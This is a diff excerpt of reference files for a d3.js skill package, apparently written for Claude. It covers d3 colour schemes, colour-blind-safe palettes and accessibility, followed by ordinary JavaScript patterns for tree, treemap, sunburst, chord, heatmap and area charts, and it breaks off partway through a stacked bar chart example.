- Balanced saturation and brightness
|
||||
|
||||
**Use cases:** General purpose categorical encoding, legend items, multiple data series
|
||||
|
||||
### Tableau10
|
||||
|
||||
```javascript
|
||||
d3.schemeTableau10
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- 10 colours optimised for data visualisation
|
||||
- Professional appearance
|
||||
- Excellent distinguishability
|
||||
|
||||
**Use cases:** Business dashboards, professional reports, presentations
|
||||
|
||||
### Accent
|
||||
|
||||
```javascript
|
||||
d3.schemeAccent
|
||||
// 8 colours with high saturation
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Bright, vibrant colours
|
||||
- High contrast
|
||||
- Modern aesthetic
|
||||
|
||||
**Use cases:** Highlighting important categories, modern web applications
|
||||
|
||||
### Dark2
|
||||
|
||||
```javascript
|
||||
d3.schemeDark2
|
||||
// 8 darker, muted colours
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Subdued palette
|
||||
- Professional appearance
|
||||
- Good for dark backgrounds
|
||||
|
||||
**Use cases:** Dark mode visualisations, professional contexts
|
||||
|
||||
### Paired
|
||||
|
||||
```javascript
|
||||
d3.schemePaired
|
||||
// 12 colours in pairs of similar hues
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Pairs of light and dark variants
|
||||
- Useful for nested categories
|
||||
- 12 distinct colours
|
||||
|
||||
**Use cases:** Grouped bar charts, hierarchical categories, before/after comparisons
|
||||
|
||||
### Pastel1 & Pastel2
|
||||
|
||||
```javascript
|
||||
d3.schemePastel1 // 9 colours
|
||||
d3.schemePastel2 // 8 colours
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Soft, low-saturation colours
|
||||
- Gentle appearance
|
||||
- Good for large areas
|
||||
|
||||
**Use cases:** Background colours, subtle categorisation, calming visualisations
|
||||
|
||||
### Set1, Set2, Set3
|
||||
|
||||
```javascript
|
||||
d3.schemeSet1 // 9 colours - vivid
|
||||
d3.schemeSet2 // 8 colours - muted
|
||||
d3.schemeSet3 // 12 colours - pastel
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Set1: High saturation, maximum distinction
|
||||
- Set2: Professional, balanced
|
||||
- Set3: Subtle, many categories
|
||||
|
||||
**Use cases:** Varied based on visual hierarchy needs
|
||||
|
||||
## Sequential colour schemes
|
||||
|
||||
Sequential schemes map continuous data from low to high values using a single hue or gradient.
|
||||
|
||||
### Single-hue sequential
|
||||
|
||||
**Blues:**
|
||||
```javascript
|
||||
d3.interpolateBlues
|
||||
d3.schemeBlues[9] // 9-step discrete version
|
||||
```
|
||||
|
||||
**Other single-hue options:**
|
||||
- `d3.interpolateGreens` / `d3.schemeGreens`
|
||||
- `d3.interpolateOranges` / `d3.schemeOranges`
|
||||
- `d3.interpolatePurples` / `d3.schemePurples`
|
||||
- `d3.interpolateReds` / `d3.schemeReds`
|
||||
- `d3.interpolateGreys` / `d3.schemeGreys`
|
||||
|
||||
**Use cases:**
|
||||
- Simple heat maps
|
||||
- Choropleth maps
|
||||
- Density plots
|
||||
- Single-metric visualisations
|
||||
|
||||
### Multi-hue sequential
|
||||
|
||||
**Viridis (recommended):**
|
||||
```javascript
|
||||
d3.interpolateViridis
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Perceptually uniform
|
||||
- Colour-blind friendly
|
||||
- Print-safe
|
||||
- No visual dead zones
|
||||
- Monotonically increasing perceived lightness
|
||||
|
||||
**Other perceptually-uniform options:**
|
||||
- `d3.interpolatePlasma` - Purple to yellow
|
||||
- `d3.interpolateInferno` - Black to white through red/orange
|
||||
- `d3.interpolateMagma` - Black to white through purple
|
||||
- `d3.interpolateCividis` - Colour-blind optimised
|
||||
|
||||
**Colour-blind accessible:**
|
||||
```javascript
|
||||
d3.interpolateTurbo // Rainbow-like but perceptually uniform
|
||||
d3.interpolateCool // Cyan to magenta
|
||||
d3.interpolateWarm // Orange to yellow
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Scientific visualisation
|
||||
- Medical imaging
|
||||
- Any high-precision data visualisation
|
||||
- Accessible visualisations
|
||||
|
||||
### Traditional sequential
|
||||
|
||||
**Yellow-Orange-Red:**
|
||||
```javascript
|
||||
d3.interpolateYlOrRd
|
||||
d3.schemeYlOrRd[9]
|
||||
```
|
||||
|
||||
**Yellow-Green-Blue:**
|
||||
```javascript
|
||||
d3.interpolateYlGnBu
|
||||
d3.schemeYlGnBu[9]
|
||||
```
|
||||
|
||||
**Other multi-hue:**
|
||||
- `d3.interpolateBuGn` - Blue to green
|
||||
- `d3.interpolateBuPu` - Blue to purple
|
||||
- `d3.interpolateGnBu` - Green to blue
|
||||
- `d3.interpolateOrRd` - Orange to red
|
||||
- `d3.interpolatePuBu` - Purple to blue
|
||||
- `d3.interpolatePuBuGn` - Purple to blue-green
|
||||
- `d3.interpolatePuRd` - Purple to red
|
||||
- `d3.interpolateRdPu` - Red to purple
|
||||
- `d3.interpolateYlGn` - Yellow to green
|
||||
- `d3.interpolateYlOrBr` - Yellow to orange-brown
|
||||
|
||||
**Use cases:** Traditional data visualisation, familiar colour associations (temperature, vegetation, water)
|
||||
|
||||
## Diverging colour schemes
|
||||
|
||||
Diverging schemes highlight deviations from a central value using two distinct hues.
|
||||
|
||||
### Red-Blue (temperature)
|
||||
|
||||
```javascript
|
||||
d3.interpolateRdBu
|
||||
d3.schemeRdBu[11]
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Intuitive temperature metaphor
|
||||
- Strong contrast
|
||||
- Clear positive/negative distinction
|
||||
|
||||
**Use cases:** Temperature, profit/loss, above/below average, correlation
|
||||
|
||||
### Red-Yellow-Blue
|
||||
|
||||
```javascript
|
||||
d3.interpolateRdYlBu
|
||||
d3.schemeRdYlBu[11]
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Three-colour gradient
|
||||
- Softer transition through yellow
|
||||
- More visual steps
|
||||
|
||||
**Use cases:** When extreme values need emphasis and middle needs visibility
|
||||
|
||||
### Other diverging schemes
|
||||
|
||||
**Traffic light:**
|
||||
```javascript
|
||||
d3.interpolateRdYlGn // Red (bad) to green (good)
|
||||
```
|
||||
|
||||
**Spectral (rainbow):**
|
||||
```javascript
|
||||
d3.interpolateSpectral // Full spectrum
|
||||
```
|
||||
|
||||
**Other options:**
|
||||
- `d3.interpolateBrBG` - Brown to blue-green
|
||||
- `d3.interpolatePiYG` - Pink to yellow-green
|
||||
- `d3.interpolatePRGn` - Purple to green
|
||||
- `d3.interpolatePuOr` - Purple to orange
|
||||
- `d3.interpolateRdGy` - Red to grey
|
||||
|
||||
**Use cases:** Choose based on semantic meaning and accessibility needs
|
||||
|
||||
## Colour-blind friendly palettes
|
||||
|
||||
### General guidelines
|
||||
|
||||
1. **Avoid red-green combinations** (most common colour blindness)
|
||||
2. **Use blue-orange diverging** instead of red-green
|
||||
3. **Add texture or patterns** as redundant encoding
|
||||
4. **Test with simulation tools**
|
||||
|
||||
### Recommended colour-blind safe schemes
|
||||
|
||||
**Categorical:**
|
||||
```javascript
|
||||
// Okabe-Ito palette (colour-blind safe)
|
||||
const okabePalette = [
|
||||
'#E69F00', // Orange
|
||||
'#56B4E9', // Sky blue
|
||||
'#009E73', // Bluish green
|
||||
'#F0E442', // Yellow
|
||||
'#0072B2', // Blue
|
||||
'#D55E00', // Vermillion
|
||||
'#CC79A7', // Reddish purple
|
||||
'#000000' // Black
|
||||
];
|
||||
|
||||
const colourScale = d3.scaleOrdinal()
|
||||
.domain(categories)
|
||||
.range(okabePalette);
|
||||
```
|
||||
|
||||
**Sequential:**
|
||||
```javascript
|
||||
// Use Viridis, Cividis, or Blues
|
||||
d3.interpolateViridis // Best overall
|
||||
d3.interpolateCividis // Optimised for CVD
|
||||
d3.interpolateBlues // Simple, safe
|
||||
```
|
||||
|
||||
**Diverging:**
|
||||
```javascript
|
||||
// Use blue-orange instead of red-green
|
||||
d3.interpolateBrBG
|
||||
d3.interpolatePuOr
|
||||
```
|
||||
|
||||
## Custom colour palettes
|
||||
|
||||
### Creating custom sequential
|
||||
|
||||
```javascript
|
||||
const customSequential = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range(['#e8f4f8', '#006d9c']) // Light to dark blue
|
||||
.interpolate(d3.interpolateLab); // Perceptually uniform
|
||||
```
|
||||
|
||||
### Creating custom diverging
|
||||
|
||||
```javascript
|
||||
const customDiverging = d3.scaleLinear()
|
||||
.domain([0, 50, 100])
|
||||
.range(['#ca0020', '#f7f7f7', '#0571b0']) // Red, grey, blue
|
||||
.interpolate(d3.interpolateLab);
|
||||
```
|
||||
|
||||
### Creating custom categorical
|
||||
|
||||
```javascript
|
||||
// Brand colours
|
||||
const brandPalette = [
|
||||
'#FF6B6B', // Primary red
|
||||
'#4ECDC4', // Secondary teal
|
||||
'#45B7D1', // Tertiary blue
|
||||
'#FFA07A', // Accent coral
|
||||
'#98D8C8' // Accent mint
|
||||
];
|
||||
|
||||
const colourScale = d3.scaleOrdinal()
|
||||
.domain(categories)
|
||||
.range(brandPalette);
|
||||
```
|
||||
|
||||
## Semantic colour associations
|
||||
|
||||
### Universal colour meanings
|
||||
|
||||
**Red:**
|
||||
- Danger, error, negative
|
||||
- High temperature
|
||||
- Debt, loss
|
||||
|
||||
**Green:**
|
||||
- Success, positive
|
||||
- Growth, vegetation
|
||||
- Profit, gain
|
||||
|
||||
**Blue:**
|
||||
- Trust, calm
|
||||
- Water, cold
|
||||
- Information, neutral
|
||||
|
||||
**Yellow/Orange:**
|
||||
- Warning, caution
|
||||
- Energy, warmth
|
||||
- Attention
|
||||
|
||||
**Grey:**
|
||||
- Neutral, inactive
|
||||
- Missing data
|
||||
- Background
|
||||
|
||||
### Context-specific palettes
|
||||
|
||||
**Financial:**
|
||||
```javascript
|
||||
const financialColours = {
|
||||
profit: '#27ae60',
|
||||
loss: '#e74c3c',
|
||||
neutral: '#95a5a6',
|
||||
highlight: '#3498db'
|
||||
};
|
||||
```
|
||||
|
||||
**Temperature:**
|
||||
```javascript
|
||||
const temperatureScale = d3.scaleSequential(d3.interpolateRdYlBu)
|
||||
.domain([40, -10]); // Hot to cold (reversed)
|
||||
```
|
||||
|
||||
**Traffic/Status:**
|
||||
```javascript
|
||||
const statusColours = {
|
||||
success: '#27ae60',
|
||||
warning: '#f39c12',
|
||||
error: '#e74c3c',
|
||||
info: '#3498db',
|
||||
neutral: '#95a5a6'
|
||||
};
|
||||
```
|
||||
|
||||
## Accessibility best practices
|
||||
|
||||
### Contrast ratios
|
||||
|
||||
Ensure sufficient contrast between colours and backgrounds:
|
||||
|
||||
```javascript
|
||||
// Good contrast example
|
||||
const highContrast = {
|
||||
background: '#ffffff',
|
||||
text: '#2c3e50',
|
||||
primary: '#3498db',
|
||||
secondary: '#e74c3c'
|
||||
};
|
||||
```
|
||||
|
||||
**WCAG guidelines:**
|
||||
- Normal text: 4.5:1 minimum
|
||||
- Large text: 3:1 minimum
|
||||
- UI components: 3:1 minimum
|
||||
|
||||
### Redundant encoding
|
||||
|
||||
Never rely solely on colour to convey information:
|
||||
|
||||
```javascript
|
||||
// Add patterns or shapes
|
||||
const symbols = ['circle', 'square', 'triangle', 'diamond'];
|
||||
|
||||
// Add text labels
|
||||
// Use line styles (solid, dashed, dotted)
|
||||
// Use size encoding
|
||||
```
|
||||
|
||||
### Testing
|
||||
|
||||
Test visualisations for colour blindness:
|
||||
- Chrome DevTools (Rendering > Emulate vision deficiencies)
|
||||
- Colour Oracle (free desktop application)
|
||||
- Coblis (online simulator)
|
||||
|
||||
## Professional colour recommendations
|
||||
|
||||
### Data journalism
|
||||
|
||||
```javascript
|
||||
// Guardian style
|
||||
const guardianPalette = [
|
||||
'#005689', // Guardian blue
|
||||
'#c70000', // Guardian red
|
||||
'#7d0068', // Guardian pink
|
||||
'#951c75', // Guardian purple
|
||||
];
|
||||
|
||||
// FT style
|
||||
const ftPalette = [
|
||||
'#0f5499', // FT blue
|
||||
'#990f3d', // FT red
|
||||
'#593380', // FT purple
|
||||
'#262a33', // FT black
|
||||
];
|
||||
```
|
||||
|
||||
### Academic/Scientific
|
||||
|
||||
```javascript
|
||||
// Nature journal style
|
||||
const naturePalette = [
|
||||
'#0071b2', // Blue
|
||||
'#d55e00', // Vermillion
|
||||
'#009e73', // Green
|
||||
'#f0e442', // Yellow
|
||||
];
|
||||
|
||||
// Use Viridis for continuous data
|
||||
const scientificScale = d3.scaleSequential(d3.interpolateViridis);
|
||||
```
|
||||
|
||||
### Corporate/Business
|
||||
|
||||
```javascript
|
||||
// Professional, conservative
|
||||
const corporatePalette = [
|
||||
'#003f5c', // Dark blue
|
||||
'#58508d', // Purple
|
||||
'#bc5090', // Magenta
|
||||
'#ff6361', // Coral
|
||||
'#ffa600' // Orange
|
||||
];
|
||||
```
|
||||
|
||||
## Dynamic colour selection
|
||||
|
||||
### Based on data range
|
||||
|
||||
```javascript
|
||||
function selectColourScheme(data) {
|
||||
const extent = d3.extent(data);
|
||||
const hasNegative = extent[0] < 0;
|
||||
const hasPositive = extent[1] > 0;
|
||||
|
||||
if (hasNegative && hasPositive) {
|
||||
// Diverging: data crosses zero
|
||||
return d3.scaleSequentialSymlog(d3.interpolateRdBu)
|
||||
.domain([extent[0], 0, extent[1]]);
|
||||
} else {
|
||||
// Sequential: all positive or all negative
|
||||
return d3.scaleSequential(d3.interpolateViridis)
|
||||
.domain(extent);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Based on category count
|
||||
|
||||
```javascript
|
||||
function selectCategoricalScheme(categories) {
|
||||
const n = categories.length;
|
||||
|
||||
if (n <= 10) {
|
||||
return d3.scaleOrdinal(d3.schemeTableau10);
|
||||
} else if (n <= 12) {
|
||||
return d3.scaleOrdinal(d3.schemePaired);
|
||||
} else {
|
||||
// For many categories, use sequential with quantize
|
||||
return d3.scaleQuantize()
|
||||
.domain([0, n - 1])
|
||||
.range(d3.quantize(d3.interpolateRainbow, n));
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Common colour mistakes to avoid
|
||||
|
||||
1. **Rainbow gradients for sequential data**
|
||||
- Problem: Not perceptually uniform, hard to read
|
||||
- Solution: Use Viridis, Blues, or other uniform schemes
|
||||
|
||||
2. **Red-green for diverging (colour blindness)**
|
||||
- Problem: 8% of males can't distinguish
|
||||
- Solution: Use blue-orange or purple-green
|
||||
|
||||
3. **Too many categorical colours**
|
||||
- Problem: Hard to distinguish and remember
|
||||
- Solution: Limit to 5-8 categories, use grouping
|
||||
|
||||
4. **Insufficient contrast**
|
||||
- Problem: Poor readability
|
||||
- Solution: Test contrast ratios, use darker colours on light backgrounds
|
||||
|
||||
5. **Culturally inconsistent colours**
|
||||
- Problem: Confusing semantic meaning
|
||||
- Solution: Research colour associations for target audience
|
||||
|
||||
6. **Inverted temperature scales**
|
||||
- Problem: Counterintuitive (red = cold)
|
||||
- Solution: Red/orange = hot, blue = cold
|
||||
|
||||
## Quick reference guide
|
||||
|
||||
**Need to show...**
|
||||
|
||||
- **Categories (≤10):** `d3.schemeCategory10` or `d3.schemeTableau10`
|
||||
- **Categories (>10):** `d3.schemePaired` or group categories
|
||||
- **Sequential (general):** `d3.interpolateViridis`
|
||||
- **Sequential (scientific):** `d3.interpolateViridis` or `d3.interpolatePlasma`
|
||||
- **Sequential (temperature):** `d3.interpolateRdYlBu` (inverted)
|
||||
- **Diverging (zero):** `d3.interpolateRdBu` or `d3.interpolateBrBG`
|
||||
- **Diverging (good/bad):** `d3.interpolateRdYlGn` (inverted)
|
||||
- **Colour-blind safe (categorical):** Okabe-Ito palette (shown above)
|
||||
- **Colour-blind safe (sequential):** `d3.interpolateCividis` or `d3.interpolateBlues`
|
||||
- **Colour-blind safe (diverging):** `d3.interpolatePuOr` or `d3.interpolateBrBG`
|
||||
|
||||
**Always remember:**
|
||||
1. Test for colour-blindness
|
||||
2. Ensure sufficient contrast
|
||||
3. Use semantic colours appropriately
|
||||
4. Add redundant encoding (patterns, labels)
|
||||
5. Keep it simple (fewer colours = clearer visualisation)
|
||||
869
skills/claude-d3js-skill/references/d3-patterns.md
Normal file
869
skills/claude-d3js-skill/references/d3-patterns.md
Normal file
@@ -0,0 +1,869 @@
|
||||
# D3.js Visualisation Patterns
|
||||
|
||||
This reference provides detailed code patterns for common d3.js visualisation types.
|
||||
|
||||
## Hierarchical visualisations
|
||||
|
||||
### Tree diagram
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
|
||||
const tree = d3.tree().size([height - 100, width - 200]);
|
||||
|
||||
const root = d3.hierarchy(data);
|
||||
tree(root);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", "translate(100,50)");
|
||||
|
||||
// Links
|
||||
g.selectAll("path")
|
||||
.data(root.links())
|
||||
.join("path")
|
||||
.attr("d", d3.linkHorizontal()
|
||||
.x(d => d.y)
|
||||
.y(d => d.x))
|
||||
.attr("fill", "none")
|
||||
.attr("stroke", "#555")
|
||||
.attr("stroke-width", 2);
|
||||
|
||||
// Nodes
|
||||
const node = g.selectAll("g")
|
||||
.data(root.descendants())
|
||||
.join("g")
|
||||
.attr("transform", d => `translate(${d.y},${d.x})`);
|
||||
|
||||
node.append("circle")
|
||||
.attr("r", 6)
|
||||
.attr("fill", d => d.children ? "#555" : "#999");
|
||||
|
||||
node.append("text")
|
||||
.attr("dy", "0.31em")
|
||||
.attr("x", d => d.children ? -8 : 8)
|
||||
.attr("text-anchor", d => d.children ? "end" : "start")
|
||||
.text(d => d.data.name)
|
||||
.style("font-size", "12px");
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Treemap
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
|
||||
const root = d3.hierarchy(data)
|
||||
.sum(d => d.value)
|
||||
.sort((a, b) => b.value - a.value);
|
||||
|
||||
d3.treemap()
|
||||
.size([width, height])
|
||||
.padding(2)
|
||||
.round(true)(root);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
const cell = svg.selectAll("g")
|
||||
.data(root.leaves())
|
||||
.join("g")
|
||||
.attr("transform", d => `translate(${d.x0},${d.y0})`);
|
||||
|
||||
cell.append("rect")
|
||||
.attr("width", d => d.x1 - d.x0)
|
||||
.attr("height", d => d.y1 - d.y0)
|
||||
.attr("fill", d => colourScale(d.parent.data.name))
|
||||
.attr("stroke", "white")
|
||||
.attr("stroke-width", 2);
|
||||
|
||||
cell.append("text")
|
||||
.attr("x", 4)
|
||||
.attr("y", 16)
|
||||
.text(d => d.data.name)
|
||||
.style("font-size", "12px")
|
||||
.style("fill", "white");
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Sunburst diagram
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 600;
|
||||
const height = 600;
|
||||
const radius = Math.min(width, height) / 2;
|
||||
|
||||
const root = d3.hierarchy(data)
|
||||
.sum(d => d.value)
|
||||
.sort((a, b) => b.value - a.value);
|
||||
|
||||
const partition = d3.partition()
|
||||
.size([2 * Math.PI, radius]);
|
||||
|
||||
partition(root);
|
||||
|
||||
const arc = d3.arc()
|
||||
.startAngle(d => d.x0)
|
||||
.endAngle(d => d.x1)
|
||||
.innerRadius(d => d.y0)
|
||||
.outerRadius(d => d.y1);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${width / 2},${height / 2})`);
|
||||
|
||||
g.selectAll("path")
|
||||
.data(root.descendants())
|
||||
.join("path")
|
||||
.attr("d", arc)
|
||||
.attr("fill", d => colourScale(d.depth))
|
||||
.attr("stroke", "white")
|
||||
.attr("stroke-width", 1);
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Chord diagram
|
||||
|
||||
```javascript
|
||||
function drawChordDiagram(data) {
|
||||
// data format: array of objects with source, target, and value
|
||||
// Example: [{ source: 'A', target: 'B', value: 10 }, ...]
|
||||
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select('#chart');
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 600;
|
||||
const height = 600;
|
||||
const innerRadius = Math.min(width, height) * 0.3;
|
||||
const outerRadius = innerRadius + 30;
|
||||
|
||||
// Create matrix from data
|
||||
const nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target])));
|
||||
const matrix = Array.from({ length: nodes.length }, () => Array(nodes.length).fill(0));
|
||||
|
||||
data.forEach(d => {
|
||||
const i = nodes.indexOf(d.source);
|
||||
const j = nodes.indexOf(d.target);
|
||||
matrix[i][j] += d.value;
|
||||
matrix[j][i] += d.value;
|
||||
});
|
||||
|
||||
// Create chord layout
|
||||
const chord = d3.chord()
|
||||
.padAngle(0.05)
|
||||
.sortSubgroups(d3.descending);
|
||||
|
||||
const arc = d3.arc()
|
||||
.innerRadius(innerRadius)
|
||||
.outerRadius(outerRadius);
|
||||
|
||||
const ribbon = d3.ribbon()
|
||||
.source(d => d.source)
|
||||
.target(d => d.target);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10)
|
||||
.domain(nodes);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${width / 2},${height / 2})`);
|
||||
|
||||
const chords = chord(matrix);
|
||||
|
||||
// Draw ribbons
|
||||
g.append("g")
|
||||
.attr("fill-opacity", 0.67)
|
||||
.selectAll("path")
|
||||
.data(chords)
|
||||
.join("path")
|
||||
.attr("d", ribbon)
|
||||
.attr("fill", d => colourScale(nodes[d.source.index]))
|
||||
.attr("stroke", d => d3.rgb(colourScale(nodes[d.source.index])).darker());
|
||||
|
||||
// Draw groups (arcs)
|
||||
const group = g.append("g")
|
||||
.selectAll("g")
|
||||
.data(chords.groups)
|
||||
.join("g");
|
||||
|
||||
group.append("path")
|
||||
.attr("d", arc)
|
||||
.attr("fill", d => colourScale(nodes[d.index]))
|
||||
.attr("stroke", d => d3.rgb(colourScale(nodes[d.index])).darker());
|
||||
|
||||
// Add labels
|
||||
group.append("text")
|
||||
.each(d => { d.angle = (d.startAngle + d.endAngle) / 2; })
|
||||
.attr("dy", "0.31em")
|
||||
.attr("transform", d => `rotate(${(d.angle * 180 / Math.PI) - 90})translate(${outerRadius + 30})${d.angle > Math.PI ? "rotate(180)" : ""}`)
|
||||
.attr("text-anchor", d => d.angle > Math.PI ? "end" : null)
|
||||
.text((d, i) => nodes[i])
|
||||
.style("font-size", "12px");
|
||||
}
|
||||
|
||||
// Data format example:
|
||||
// const data = [
|
||||
// { source: 'Category A', target: 'Category B', value: 100 },
|
||||
// { source: 'Category A', target: 'Category C', value: 50 },
|
||||
// { source: 'Category B', target: 'Category C', value: 75 }
|
||||
// ];
|
||||
// drawChordDiagram(data);
|
||||
```
|
||||
|
||||
## Advanced chart types
|
||||
|
||||
### Heatmap
|
||||
|
||||
```javascript
|
||||
function drawHeatmap(data) {
|
||||
// data format: array of objects with row, column, and value
|
||||
// Example: [{ row: 'A', column: 'X', value: 10 }, ...]
|
||||
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select('#chart');
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
const margin = { top: 100, right: 30, bottom: 30, left: 100 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
// Get unique rows and columns
|
||||
const rows = Array.from(new Set(data.map(d => d.row)));
|
||||
const columns = Array.from(new Set(data.map(d => d.column)));
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
// Create scales
|
||||
const xScale = d3.scaleBand()
|
||||
.domain(columns)
|
||||
.range([0, innerWidth])
|
||||
.padding(0.01);
|
||||
|
||||
const yScale = d3.scaleBand()
|
||||
.domain(rows)
|
||||
.range([0, innerHeight])
|
||||
.padding(0.01);
|
||||
|
||||
// Colour scale for values (sequential from light to dark red)
|
||||
const colourScale = d3.scaleSequential(d3.interpolateYlOrRd)
|
||||
.domain([0, d3.max(data, d => d.value)]);
|
||||
|
||||
// Draw rectangles
|
||||
g.selectAll("rect")
|
||||
.data(data)
|
||||
.join("rect")
|
||||
.attr("x", d => xScale(d.column))
|
||||
.attr("y", d => yScale(d.row))
|
||||
.attr("width", xScale.bandwidth())
|
||||
.attr("height", yScale.bandwidth())
|
||||
.attr("fill", d => colourScale(d.value));
|
||||
|
||||
// Add x-axis labels
|
||||
svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`)
|
||||
.selectAll("text")
|
||||
.data(columns)
|
||||
.join("text")
|
||||
.attr("x", d => xScale(d) + xScale.bandwidth() / 2)
|
||||
.attr("y", -10)
|
||||
.attr("text-anchor", "middle")
|
||||
.text(d => d)
|
||||
.style("font-size", "12px");
|
||||
|
||||
// Add y-axis labels
|
||||
svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`)
|
||||
.selectAll("text")
|
||||
.data(rows)
|
||||
.join("text")
|
||||
.attr("x", -10)
|
||||
.attr("y", d => yScale(d) + yScale.bandwidth() / 2)
|
||||
.attr("dy", "0.35em")
|
||||
.attr("text-anchor", "end")
|
||||
.text(d => d)
|
||||
.style("font-size", "12px");
|
||||
|
||||
// Add colour legend
|
||||
const legendWidth = 20;
|
||||
const legendHeight = 200;
|
||||
const legend = svg.append("g")
|
||||
.attr("transform", `translate(${width - 60},${margin.top})`);
|
||||
|
||||
const legendScale = d3.scaleLinear()
|
||||
.domain(colourScale.domain())
|
||||
.range([legendHeight, 0]);
|
||||
|
||||
const legendAxis = d3.axisRight(legendScale).ticks(5);
|
||||
|
||||
// Draw colour gradient in legend
|
||||
for (let i = 0; i < legendHeight; i++) {
|
||||
legend.append("rect")
|
||||
.attr("y", i)
|
||||
.attr("width", legendWidth)
|
||||
.attr("height", 1)
|
||||
.attr("fill", colourScale(legendScale.invert(i)));
|
||||
}
|
||||
|
||||
legend.append("g")
|
||||
.attr("transform", `translate(${legendWidth},0)`)
|
||||
.call(legendAxis);
|
||||
}
|
||||
|
||||
// Data format example:
|
||||
// const data = [
|
||||
// { row: 'Monday', column: 'Morning', value: 42 },
|
||||
// { row: 'Monday', column: 'Afternoon', value: 78 },
|
||||
// { row: 'Tuesday', column: 'Morning', value: 65 },
|
||||
// { row: 'Tuesday', column: 'Afternoon', value: 55 }
|
||||
// ];
|
||||
// drawHeatmap(data);
|
||||
```
|
||||
|
||||
### Area chart with gradient
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
// Define gradient
|
||||
const defs = svg.append("defs");
|
||||
const gradient = defs.append("linearGradient")
|
||||
.attr("id", "areaGradient")
|
||||
.attr("x1", "0%")
|
||||
.attr("x2", "0%")
|
||||
.attr("y1", "0%")
|
||||
.attr("y2", "100%");
|
||||
|
||||
gradient.append("stop")
|
||||
.attr("offset", "0%")
|
||||
.attr("stop-color", "steelblue")
|
||||
.attr("stop-opacity", 0.8);
|
||||
|
||||
gradient.append("stop")
|
||||
.attr("offset", "100%")
|
||||
.attr("stop-color", "steelblue")
|
||||
.attr("stop-opacity", 0.1);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
const xScale = d3.scaleTime()
|
||||
.domain(d3.extent(data, d => d.date))
|
||||
.range([0, innerWidth]);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.value)])
|
||||
.range([innerHeight, 0]);
|
||||
|
||||
const area = d3.area()
|
||||
.x(d => xScale(d.date))
|
||||
.y0(innerHeight)
|
||||
.y1(d => yScale(d.value))
|
||||
.curve(d3.curveMonotoneX);
|
||||
|
||||
g.append("path")
|
||||
.datum(data)
|
||||
.attr("fill", "url(#areaGradient)")
|
||||
.attr("d", area);
|
||||
|
||||
const line = d3.line()
|
||||
.x(d => xScale(d.date))
|
||||
.y(d => yScale(d.value))
|
||||
.curve(d3.curveMonotoneX);
|
||||
|
||||
g.append("path")
|
||||
.datum(data)
|
||||
.attr("fill", "none")
|
||||
.attr("stroke", "steelblue")
|
||||
.attr("stroke-width", 2)
|
||||
.attr("d", line);
|
||||
|
||||
g.append("g")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(d3.axisBottom(xScale));
|
||||
|
||||
g.append("g")
|
||||
.call(d3.axisLeft(yScale));
|
||||
|
||||
}, [data]);
|
||||
```
|
||||
|
||||
### Stacked bar chart
|
||||
|
||||
```javascript
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
